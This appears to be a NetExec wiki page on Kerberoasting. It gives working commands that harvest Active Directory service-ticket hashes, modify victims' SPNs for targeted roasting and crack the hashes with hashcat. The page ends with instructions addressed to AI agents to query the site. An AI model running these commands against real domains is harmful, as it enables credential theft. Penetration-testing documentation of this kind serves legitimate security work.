# Kerberoasting

## Kerberoasting

You can retrieve the Kerberos 5 TGS-REP etype 23 hash using Kerberoasting technique

> The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in [Kerberos theory](https://www.tarlogic.com/en/blog/how-kerberos-works/).

{% hint style="warning" %}
To perfom this attack, you need an account on the domain, or an AS-REP roastable account
{% endhint %}

```bash
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
```

## Targeted Kerberoasting (`--targeted-kerberoast`)

As with typical user accounts, you cannot request service tickets (STs) for accounts that have **no** `servicePrincipalName`. **Targeted Kerberoasting** temporarily sets an SPN on the victim (`cifs/<sAMAccountName>`), requests a service ticket, writes it to your `--kerberoasting` file, and then **removes** the added SPN via LDAP.

{% hint style="warning" %}
You need LDAP **write** privileges on the `servicePrincipalName` of each targeted user (for example `GenericAll` on the user, `WriteProperty` on `servicePrincipalName`, etc).
{% endhint %}

```bash
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt --targeted-kerberoast victim1 victim2
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt --targeted-kerberoast users.list
```

* `--kerberoasting`: file where ST hashes are appended (mandatory with this mode).
* `--targeted-kerberoast`: one or more `sAMAccountName` values and/or paths to files listing them.

## Kerberoasting via AS-REP Roasting

> You can also perform Kerberoasting by leveraging an AS-REP roastable account that does not require pre-authentication. This is possible by combining `--no-preauth-targets` and `--kerberoasting`.

```bash
nxc ldap 192.168.0.104 -u harry -p '' --no-preauth-targets kerberoastable.list --kerberoasting output.txt
```

* `-u`: AS-REP roastable user (no pre-auth required).
* `--no-preauth-targets`: Single user or file containing list of users to target with Kerberoasting.

#### Cracking with hashcat

```bash
hashcat -m13100 output.txt wordlist.txt
```

#### Example

Active machine is a good example to test **Kerberoasting** with NetExec

{% embed url="<https://www.hackthebox.com/machines/active>" %}

#### Useful ressources:

{% embed url="<https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>" %}

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting>" %}

{% embed url="<https://en.hackndo.com/kerberoasting/>" %}

{% embed url="<https://www.semperis.com/blog/new-attack-paths-as-requested-sts/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.netexec.wiki/ldap-protocol/kerberoasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.